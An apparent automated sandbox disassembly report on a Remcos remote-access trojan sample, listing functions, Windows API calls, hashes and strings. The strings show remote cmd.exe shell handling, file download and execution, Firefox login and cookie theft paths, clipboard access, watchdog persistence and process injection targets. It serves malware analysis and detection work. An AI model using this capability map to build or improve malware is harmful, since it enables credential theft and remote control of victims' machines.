Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE

Uniqueness

Uniqueness Score: -1.00%

Function 00438D94 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00438DA9

Strings

FlsAlloc, xrefs: 00438DA2

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE

Uniqueness

Uniqueness Score: -1.00%

Function 0044F119 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 0044EF58 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD

Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17

_free.LIBCMT ref: 0044EFD0
_free.LIBCMT ref: 0044F006

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8

Uniqueness

Uniqueness Score: -1.00%

Function 0041CAE1 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8), ref: 0041CB09
LocalFree.KERNEL32(?,?), ref: 0041CB2F

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FormatFreeLocalMessage
String ID:
API String ID: 1427518018-0
Opcode ID: f61b3e4ee492e5c6c8ed6053afc0cdea8308696fa5ae5c0b5b9a4b82b5d7ebf3
Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
Opcode Fuzzy Hash: f61b3e4ee492e5c6c8ed6053afc0cdea8308696fa5ae5c0b5b9a4b82b5d7ebf3
Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659

Uniqueness

Uniqueness Score: -1.00%

Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 00404852
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E

Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D

Uniqueness

Uniqueness Score: -1.00%

Function 00414EE9 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
WSASetLastError.WS2_32(00000000), ref: 00414F10

Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
String ID:
API String ID: 1170566393-0
Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8

Uniqueness

Uniqueness Score: -1.00%

Function 0043A3EC Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F

Uniqueness

Uniqueness Score: -1.00%

Function 0043AA1B Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 0043AA70

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
Instruction ID: 96d9d97d68b67d0c8e80b5665a39335b0ee5c72343be31c2f0b4d265a228e715
Opcode Fuzzy Hash: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
Instruction Fuzzy Hash: 08012872950318BFDB24EF64C942B6E77ECEB0531DF10846FE48597240C6799D00C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF

Uniqueness

Uniqueness Score: -1.00%

Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 004048B3

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00407CB9
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
DeleteFileW.KERNEL32(00000000), ref: 00407DA9

Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
GetLogicalDriveStringsA.KERNEL32 ref: 00408278
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
DeleteFileA.KERNEL32(?), ref: 00408652

Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF

Sleep.KERNEL32(000007D0), ref: 004086F8
StrToIntA.SHLWAPI(00000000), ref: 0040873A

Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7

Strings

XPG, xrefs: 00407DED
XPG, xrefs: 004082E7
(PG, xrefs: 004081F2
Downloaded file: , xrefs: 0040802E
Downloading file: , xrefs: 00407F7D
Executing file: , xrefs: 004081AD
XPG, xrefs: 00408718
open, xrefs: 00408191
XPG, xrefs: 00408430
Deleted file: , xrefs: 00407DC8
Browsing directory: , xrefs: 00408238
Unable to delete: , xrefs: 00407E07
Unable to rename file!, xrefs: 00408413
NG, xrefs: 00407CE5
Failed to download file: , xrefs: 004080A5

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
API String ID: 1067849700-181434739
Opcode ID: 1b7309539a84446222819b5917d87a8cfb06ae0e6f1477b6187b96fa025f3c7e
Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
Opcode Fuzzy Hash: 1b7309539a84446222819b5917d87a8cfb06ae0e6f1477b6187b96fa025f3c7e
Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B

Uniqueness

Uniqueness Score: -1.00%

Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056E6

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__Init_thread_footer.LIBCMT ref: 00405723
CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
TerminateProcess.KERNEL32(00000000), ref: 00405A17
CloseHandle.KERNEL32 ref: 00405A23
CloseHandle.KERNEL32 ref: 00405A2B
CloseHandle.KERNEL32 ref: 00405A3D
CloseHandle.KERNEL32 ref: 00405A45

Strings

SystemDrive, xrefs: 00405761
0lG, xrefs: 00405988
kG, xrefs: 004057DB
0lG, xrefs: 004056D0
0lG, xrefs: 0040585A
0lG, xrefs: 00405954
cmd.exe, xrefs: 0040574D
0lG, xrefs: 00405A2D

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
API String ID: 2994406822-18413064
Opcode ID: ba88ca4a1fa9ee8dcde29f48ac822d2e534d54b39ff96ea4efa43df10abf76ae
Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
Opcode Fuzzy Hash: ba88ca4a1fa9ee8dcde29f48ac822d2e534d54b39ff96ea4efa43df10abf76ae
Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00412106

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4), ref: 004138AB

OpenMutexA.KERNEL32 ref: 00412146
CloseHandle.KERNEL32(00000000), ref: 00412155
CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A

Strings

WDH, xrefs: 004121B5, 004121BB, 00412420
fsutil.exe, xrefs: 0041230F
rmclient.exe, xrefs: 004122EA
WinDir, xrefs: 0041221B, 00412270
Watchdog launch failed!, xrefs: 00412383
\system32\, xrefs: 00412209
Remcos restarted by watchdog!, xrefs: 00412160
Watchdog module activated, xrefs: 00412184, 004123DC
\SysWOW64\, xrefs: 00412261
svchost.exe, xrefs: 004122C5

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
API String ID: 3018269243-13974260
Opcode ID: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
Opcode Fuzzy Hash: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
FindClose.KERNEL32(00000000), ref: 0040BBC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
FindClose.KERNEL32(00000000), ref: 0040BD12

Strings

UserProfile, xrefs: 0040BB60
[Firefox StoredLogins Cleared!], xrefs: 0040BCFF
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BB52
\logins.json, xrefs: 0040BC34
[Firefox StoredLogins not found], xrefs: 0040BBD4
\key3.db, xrefs: 0040BC76

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89

Uniqueness

Uniqueness Score: -1.00%

Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004168C2
EmptyClipboard.USER32 ref: 004168D0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
GlobalLock.KERNEL32 ref: 004168F9
GlobalUnlock.KERNEL32(00000000), ref: 0041692F
SetClipboardData.USER32 ref: 00416938
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32 ref: 0041696C
GlobalLock.KERNEL32 ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID: !D@
API String ID: 3520204547-604454484
Opcode ID: fe582c62d716831c7a5d686468f8ff4fa392a0f30dc1f81f04eaead869cdf2c1
Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
Opcode Fuzzy Hash: fe582c62d716831c7a5d686468f8ff4fa392a0f30dc1f81f04eaead869cdf2c1
Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
FindClose.KERNEL32(00000000), ref: 0040BDC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
FindClose.KERNEL32(00000000), ref: 0040BEAF
FindClose.KERNEL32(00000000), ref: 0040BED0

Strings

UserProfile, xrefs: 0040BD60
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BD52
[Firefox cookies found, cleared!], xrefs: 0040BEDF
[Firefox Cookies not found], xrefs: 0040BDD4, 0040BE9C
\cookies.sqlite, xrefs: 0040BE2C

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
CloseHandle.KERNEL32(00000000), ref: 0040F563

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

CloseHandle.KERNEL32(00000000), ref: 0040F66E

Strings

ieinstal.exe, xrefs: 0040F6D5
ielowutil.exe, xrefs: 0040F716
Inj, xrefs: 0040F769
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040F6BE

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

